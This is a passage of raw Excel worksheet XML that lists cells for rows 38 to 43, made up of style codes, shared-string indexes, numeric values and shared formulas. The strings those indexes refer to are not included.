      <c r="DX38" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY38" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ38" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA38" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB38" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC38" s="74">
        <v>0.0</v>
      </c>
      <c r="ED38" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE38" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="39" ht="153.75" customHeight="1">
      <c r="B39" s="71" t="s">
        <v>514</v>
      </c>
      <c r="C39" s="72" t="s">
        <v>505</v>
      </c>
      <c r="D39" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E39" s="72" t="s">
        <v>506</v>
      </c>
      <c r="F39" s="72" t="s">
        <v>507</v>
      </c>
      <c r="G39" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H39" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I39" s="73" t="s">
        <v>515</v>
      </c>
      <c r="J39" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K39" s="73" t="s">
        <v>516</v>
      </c>
      <c r="L39" s="74">
        <v>1.0</v>
      </c>
      <c r="M39" s="74">
        <v>1.0</v>
      </c>
      <c r="N39" s="74">
        <v>1.0</v>
      </c>
      <c r="O39" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P39" s="74">
        <v>1.0</v>
      </c>
      <c r="Q39" s="74">
        <v>0.0</v>
      </c>
      <c r="R39" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S39" s="76" t="s">
        <v>510</v>
      </c>
      <c r="T39" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U39" s="77" t="s">
        <v>517</v>
      </c>
      <c r="V39" s="76" t="s">
        <v>518</v>
      </c>
      <c r="W39" s="76" t="s">
        <v>519</v>
      </c>
      <c r="X39" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y39" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z39" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA39" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB39" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC39" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD39" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE39" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF39" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG39" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH39" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI39" s="78"/>
      <c r="AJ39" s="78"/>
      <c r="AK39" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL39" s="78"/>
      <c r="AM39" s="78"/>
      <c r="AN39" s="78"/>
      <c r="AO39" s="78"/>
      <c r="AP39" s="80"/>
      <c r="AQ39" s="80"/>
      <c r="AR39" s="80"/>
      <c r="AS39" s="80">
        <v>0.0</v>
      </c>
      <c r="AT39" s="80"/>
      <c r="AU39" s="80"/>
      <c r="AV39" s="80"/>
      <c r="AW39" s="80"/>
      <c r="AX39" s="80"/>
      <c r="AY39" s="80"/>
      <c r="AZ39" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA39" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB39" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC39" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD39" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE39" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF39" s="82"/>
      <c r="BG39" s="82"/>
      <c r="BH39" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI39" s="82"/>
      <c r="BJ39" s="82"/>
      <c r="BK39" s="82"/>
      <c r="BL39" s="82"/>
      <c r="BM39" s="83"/>
      <c r="BN39" s="83"/>
      <c r="BO39" s="83"/>
      <c r="BP39" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ39" s="83"/>
      <c r="BR39" s="83"/>
      <c r="BS39" s="83"/>
      <c r="BT39" s="83"/>
      <c r="BU39" s="83"/>
      <c r="BV39" s="83"/>
      <c r="BW39" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX39" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY39" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ39" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA39" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB39" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC39" s="85"/>
      <c r="CD39" s="85"/>
      <c r="CE39" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF39" s="85"/>
      <c r="CG39" s="85"/>
      <c r="CH39" s="85"/>
      <c r="CI39" s="85"/>
      <c r="CJ39" s="86"/>
      <c r="CK39" s="86"/>
      <c r="CL39" s="86"/>
      <c r="CM39" s="86">
        <v>0.0</v>
      </c>
      <c r="CN39" s="86"/>
      <c r="CO39" s="86"/>
      <c r="CP39" s="86"/>
      <c r="CQ39" s="86"/>
      <c r="CR39" s="86"/>
      <c r="CS39" s="86"/>
      <c r="CT39" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU39" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV39" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW39" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX39" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY39" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ39" s="88"/>
      <c r="DA39" s="88"/>
      <c r="DB39" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC39" s="88"/>
      <c r="DD39" s="88"/>
      <c r="DE39" s="88"/>
      <c r="DF39" s="88"/>
      <c r="DG39" s="89"/>
      <c r="DH39" s="89"/>
      <c r="DI39" s="89"/>
      <c r="DJ39" s="89">
        <v>0.0</v>
      </c>
      <c r="DK39" s="89"/>
      <c r="DL39" s="89"/>
      <c r="DM39" s="89"/>
      <c r="DN39" s="89"/>
      <c r="DO39" s="89"/>
      <c r="DP39" s="89"/>
      <c r="DQ39" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR39" s="91"/>
      <c r="DS39" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT39" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU39" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB39" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC39" s="74">
        <v>0.0</v>
      </c>
      <c r="ED39" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE39" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="40" ht="153.75" customHeight="1">
      <c r="B40" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C40" s="72" t="s">
        <v>505</v>
      </c>
      <c r="D40" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E40" s="72" t="s">
        <v>506</v>
      </c>
      <c r="F40" s="72" t="s">
        <v>507</v>
      </c>
      <c r="G40" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H40" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I40" s="73" t="s">
        <v>520</v>
      </c>
      <c r="J40" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K40" s="73" t="s">
        <v>521</v>
      </c>
      <c r="L40" s="74">
        <v>1.0</v>
      </c>
      <c r="M40" s="74">
        <v>1.0</v>
      </c>
      <c r="N40" s="74">
        <v>1.0</v>
      </c>
      <c r="O40" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P40" s="74">
        <v>1.0</v>
      </c>
      <c r="Q40" s="74">
        <v>0.0</v>
      </c>
      <c r="R40" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S40" s="76" t="s">
        <v>510</v>
      </c>
      <c r="T40" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U40" s="77" t="s">
        <v>522</v>
      </c>
      <c r="V40" s="76" t="s">
        <v>523</v>
      </c>
      <c r="W40" s="76" t="s">
        <v>524</v>
      </c>
      <c r="X40" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y40" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z40" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA40" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB40" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC40" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD40" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE40" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF40" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG40" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH40" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI40" s="78"/>
      <c r="AJ40" s="78"/>
      <c r="AK40" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL40" s="78"/>
      <c r="AM40" s="78"/>
      <c r="AN40" s="78"/>
      <c r="AO40" s="78"/>
      <c r="AP40" s="80"/>
      <c r="AQ40" s="80"/>
      <c r="AR40" s="80"/>
      <c r="AS40" s="80">
        <v>0.0</v>
      </c>
      <c r="AT40" s="80"/>
      <c r="AU40" s="80"/>
      <c r="AV40" s="80"/>
      <c r="AW40" s="80"/>
      <c r="AX40" s="80"/>
      <c r="AY40" s="80"/>
      <c r="AZ40" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA40" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB40" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC40" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD40" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE40" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF40" s="82"/>
      <c r="BG40" s="82"/>
      <c r="BH40" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI40" s="82"/>
      <c r="BJ40" s="82"/>
      <c r="BK40" s="82"/>
      <c r="BL40" s="82"/>
      <c r="BM40" s="83"/>
      <c r="BN40" s="83"/>
      <c r="BO40" s="83"/>
      <c r="BP40" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ40" s="83"/>
      <c r="BR40" s="83"/>
      <c r="BS40" s="83"/>
      <c r="BT40" s="83"/>
      <c r="BU40" s="83"/>
      <c r="BV40" s="83"/>
      <c r="BW40" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX40" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY40" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ40" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA40" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB40" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC40" s="85"/>
      <c r="CD40" s="85"/>
      <c r="CE40" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF40" s="85"/>
      <c r="CG40" s="85"/>
      <c r="CH40" s="85"/>
      <c r="CI40" s="85"/>
      <c r="CJ40" s="86"/>
      <c r="CK40" s="86"/>
      <c r="CL40" s="86"/>
      <c r="CM40" s="86">
        <v>0.0</v>
      </c>
      <c r="CN40" s="86"/>
      <c r="CO40" s="86"/>
      <c r="CP40" s="86"/>
      <c r="CQ40" s="86"/>
      <c r="CR40" s="86"/>
      <c r="CS40" s="86"/>
      <c r="CT40" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU40" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV40" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW40" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX40" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY40" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ40" s="88"/>
      <c r="DA40" s="88"/>
      <c r="DB40" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC40" s="88"/>
      <c r="DD40" s="88"/>
      <c r="DE40" s="88"/>
      <c r="DF40" s="88"/>
      <c r="DG40" s="89"/>
      <c r="DH40" s="89"/>
      <c r="DI40" s="89"/>
      <c r="DJ40" s="89">
        <v>0.0</v>
      </c>
      <c r="DK40" s="89"/>
      <c r="DL40" s="89"/>
      <c r="DM40" s="89"/>
      <c r="DN40" s="89"/>
      <c r="DO40" s="89"/>
      <c r="DP40" s="89"/>
      <c r="DQ40" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR40" s="91"/>
      <c r="DS40" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT40" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU40" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB40" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC40" s="74">
        <v>0.0</v>
      </c>
      <c r="ED40" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE40" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="41" ht="153.75" customHeight="1">
      <c r="B41" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C41" s="72" t="s">
        <v>505</v>
      </c>
      <c r="D41" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E41" s="72" t="s">
        <v>506</v>
      </c>
      <c r="F41" s="72" t="s">
        <v>507</v>
      </c>
      <c r="G41" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H41" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I41" s="73" t="s">
        <v>525</v>
      </c>
      <c r="J41" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K41" s="73" t="s">
        <v>526</v>
      </c>
      <c r="L41" s="74">
        <v>1.0</v>
      </c>
      <c r="M41" s="74">
        <v>1.0</v>
      </c>
      <c r="N41" s="74">
        <v>1.0</v>
      </c>
      <c r="O41" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P41" s="74">
        <v>1.0</v>
      </c>
      <c r="Q41" s="74">
        <v>0.0</v>
      </c>
      <c r="R41" s="75" t="s">
        <v>307</v>
      </c>
      <c r="S41" s="76" t="s">
        <v>527</v>
      </c>
      <c r="T41" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U41" s="77" t="s">
        <v>528</v>
      </c>
      <c r="V41" s="76" t="s">
        <v>529</v>
      </c>
      <c r="W41" s="76" t="s">
        <v>530</v>
      </c>
      <c r="X41" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y41" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z41" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA41" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB41" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC41" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD41" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE41" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF41" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG41" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH41" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI41" s="78"/>
      <c r="AJ41" s="78"/>
      <c r="AK41" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL41" s="78"/>
      <c r="AM41" s="78"/>
      <c r="AN41" s="78"/>
      <c r="AO41" s="78"/>
      <c r="AP41" s="80"/>
      <c r="AQ41" s="80"/>
      <c r="AR41" s="80"/>
      <c r="AS41" s="80">
        <v>0.0</v>
      </c>
      <c r="AT41" s="80"/>
      <c r="AU41" s="80"/>
      <c r="AV41" s="80"/>
      <c r="AW41" s="80"/>
      <c r="AX41" s="80"/>
      <c r="AY41" s="80"/>
      <c r="AZ41" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA41" s="82">
        <v>2013028.0</v>
      </c>
      <c r="BB41" s="82">
        <v>1.0</v>
      </c>
      <c r="BC41" s="82">
        <v>1.0</v>
      </c>
      <c r="BD41" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE41" s="82">
        <v>2013028.0</v>
      </c>
      <c r="BF41" s="82"/>
      <c r="BG41" s="82"/>
      <c r="BH41" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI41" s="82"/>
      <c r="BJ41" s="82"/>
      <c r="BK41" s="82"/>
      <c r="BL41" s="82"/>
      <c r="BM41" s="83"/>
      <c r="BN41" s="83"/>
      <c r="BO41" s="83"/>
      <c r="BP41" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ41" s="83"/>
      <c r="BR41" s="83"/>
      <c r="BS41" s="83"/>
      <c r="BT41" s="83"/>
      <c r="BU41" s="83"/>
      <c r="BV41" s="83"/>
      <c r="BW41" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX41" s="85" t="s">
        <v>531</v>
      </c>
      <c r="BY41" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ41" s="85">
        <v>2.0</v>
      </c>
      <c r="CA41" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB41" s="85" t="s">
        <v>531</v>
      </c>
      <c r="CC41" s="85"/>
      <c r="CD41" s="85"/>
      <c r="CE41" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF41" s="85"/>
      <c r="CG41" s="85"/>
      <c r="CH41" s="85"/>
      <c r="CI41" s="85"/>
      <c r="CJ41" s="86"/>
      <c r="CK41" s="86"/>
      <c r="CL41" s="86"/>
      <c r="CM41" s="86">
        <v>0.0</v>
      </c>
      <c r="CN41" s="86"/>
      <c r="CO41" s="86"/>
      <c r="CP41" s="86"/>
      <c r="CQ41" s="86"/>
      <c r="CR41" s="86"/>
      <c r="CS41" s="86"/>
      <c r="CT41" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU41" s="88" t="s">
        <v>532</v>
      </c>
      <c r="CV41" s="88">
        <v>6.0</v>
      </c>
      <c r="CW41" s="88">
        <v>10822.0</v>
      </c>
      <c r="CX41" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY41" s="88" t="s">
        <v>533</v>
      </c>
      <c r="CZ41" s="88"/>
      <c r="DA41" s="88"/>
      <c r="DB41" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC41" s="88"/>
      <c r="DD41" s="88"/>
      <c r="DE41" s="88"/>
      <c r="DF41" s="88"/>
      <c r="DG41" s="89"/>
      <c r="DH41" s="89"/>
      <c r="DI41" s="89"/>
      <c r="DJ41" s="89">
        <v>0.0</v>
      </c>
      <c r="DK41" s="89"/>
      <c r="DL41" s="89"/>
      <c r="DM41" s="89"/>
      <c r="DN41" s="89"/>
      <c r="DO41" s="89"/>
      <c r="DP41" s="89"/>
      <c r="DQ41" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR41" s="91"/>
      <c r="DS41" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT41" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU41" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA41" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB41" s="74" t="s">
        <v>12</v>
      </c>
      <c r="EC41" s="74">
        <v>0.0</v>
      </c>
      <c r="ED41" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE41" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="42" ht="153.75" customHeight="1">
      <c r="B42" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C42" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D42" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E42" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F42" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G42" s="97" t="s">
        <v>537</v>
      </c>
      <c r="H42" s="72" t="s">
        <v>538</v>
      </c>
      <c r="I42" s="73" t="s">
        <v>539</v>
      </c>
      <c r="J42" s="73" t="s">
        <v>540</v>
      </c>
      <c r="K42" s="73" t="s">
        <v>541</v>
      </c>
      <c r="L42" s="74">
        <v>13.0</v>
      </c>
      <c r="M42" s="74">
        <v>1.0</v>
      </c>
      <c r="N42" s="74">
        <v>1.0</v>
      </c>
      <c r="O42" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P42" s="74">
        <v>1.0</v>
      </c>
      <c r="Q42" s="74">
        <v>0.0</v>
      </c>
      <c r="R42" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S42" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T42" s="76" t="s">
        <v>542</v>
      </c>
      <c r="U42" s="77" t="s">
        <v>543</v>
      </c>
      <c r="V42" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W42" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X42" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y42" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z42" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA42" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB42" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC42" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD42" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE42" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF42" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG42" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH42" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI42" s="78"/>
      <c r="AJ42" s="78"/>
      <c r="AK42" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL42" s="78"/>
      <c r="AM42" s="78"/>
      <c r="AN42" s="78"/>
      <c r="AO42" s="78"/>
      <c r="AP42" s="80"/>
      <c r="AQ42" s="80"/>
      <c r="AR42" s="80"/>
      <c r="AS42" s="80">
        <v>0.0</v>
      </c>
      <c r="AT42" s="80"/>
      <c r="AU42" s="80"/>
      <c r="AV42" s="80"/>
      <c r="AW42" s="80"/>
      <c r="AX42" s="80"/>
      <c r="AY42" s="80"/>
      <c r="AZ42" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA42" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB42" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC42" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD42" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE42" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF42" s="82"/>
      <c r="BG42" s="82"/>
      <c r="BH42" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI42" s="82"/>
      <c r="BJ42" s="82"/>
      <c r="BK42" s="82"/>
      <c r="BL42" s="82"/>
      <c r="BM42" s="83"/>
      <c r="BN42" s="83"/>
      <c r="BO42" s="83"/>
      <c r="BP42" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ42" s="83"/>
      <c r="BR42" s="83"/>
      <c r="BS42" s="83"/>
      <c r="BT42" s="83"/>
      <c r="BU42" s="83"/>
      <c r="BV42" s="83"/>
      <c r="BW42" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX42" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY42" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ42" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA42" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB42" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC42" s="85"/>
      <c r="CD42" s="85"/>
      <c r="CE42" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF42" s="85"/>
      <c r="CG42" s="85"/>
      <c r="CH42" s="85"/>
      <c r="CI42" s="85"/>
      <c r="CJ42" s="86"/>
      <c r="CK42" s="86"/>
      <c r="CL42" s="86"/>
      <c r="CM42" s="86">
        <v>0.0</v>
      </c>
      <c r="CN42" s="86"/>
      <c r="CO42" s="86"/>
      <c r="CP42" s="86"/>
      <c r="CQ42" s="86"/>
      <c r="CR42" s="86"/>
      <c r="CS42" s="86"/>
      <c r="CT42" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU42" s="88" t="s">
        <v>544</v>
      </c>
      <c r="CV42" s="88">
        <v>3.0</v>
      </c>
      <c r="CW42" s="88">
        <v>10.0</v>
      </c>
      <c r="CX42" s="79" t="s">
        <v>545</v>
      </c>
      <c r="CY42" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ42" s="88"/>
      <c r="DA42" s="88"/>
      <c r="DB42" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC42" s="88"/>
      <c r="DD42" s="88"/>
      <c r="DE42" s="88"/>
      <c r="DF42" s="88"/>
      <c r="DG42" s="89"/>
      <c r="DH42" s="89"/>
      <c r="DI42" s="89"/>
      <c r="DJ42" s="89">
        <v>0.0</v>
      </c>
      <c r="DK42" s="89"/>
      <c r="DL42" s="89"/>
      <c r="DM42" s="89"/>
      <c r="DN42" s="89"/>
      <c r="DO42" s="89"/>
      <c r="DP42" s="89"/>
      <c r="DQ42" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR42" s="91"/>
      <c r="DS42" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT42" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU42" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA42" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB42" s="74">
        <v>13.0</v>
      </c>
      <c r="EC42" s="74">
        <v>0.0</v>
      </c>
      <c r="ED42" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE42" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="43" ht="153.75" customHeight="1">
      <c r="B43" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C43" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D43" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E43" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F43" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G43" s="97" t="s">
        <v>537</v>
      </c>
      <c r="H43" s="72" t="s">
        <v>538</v>
      </c>
      <c r="I43" s="73" t="s">
        <v>539</v>
      </c>
      <c r="J43" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K43" s="73" t="s">
        <v>546</v>
      </c>
      <c r="L43" s="74">
        <v>0.0</v>
      </c>
      <c r="M43" s="74">
        <v>1.0</v>
      </c>
      <c r="N43" s="74">
        <v>2.0</v>
      </c>
      <c r="O43" s="74">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="P43" s="74">
        <v>2.0</v>
      </c>
      <c r="Q43" s="74">
        <v>0.0</v>
      </c>
      <c r="R43" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S43" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T43" s="76" t="s">
        <v>547</v>
      </c>
      <c r="U43" s="77" t="s">
        <v>548</v>
      </c>
      <c r="V43" s="76" t="s">
        <v>549</v>
      </c>
      <c r="W43" s="76" t="s">
        <v>550</v>
      </c>
      <c r="X43" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y43" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z43" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA43" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB43" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC43" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD43" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE43" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF43" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG43" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH43" s="78" t="s">
        <v>12</v>
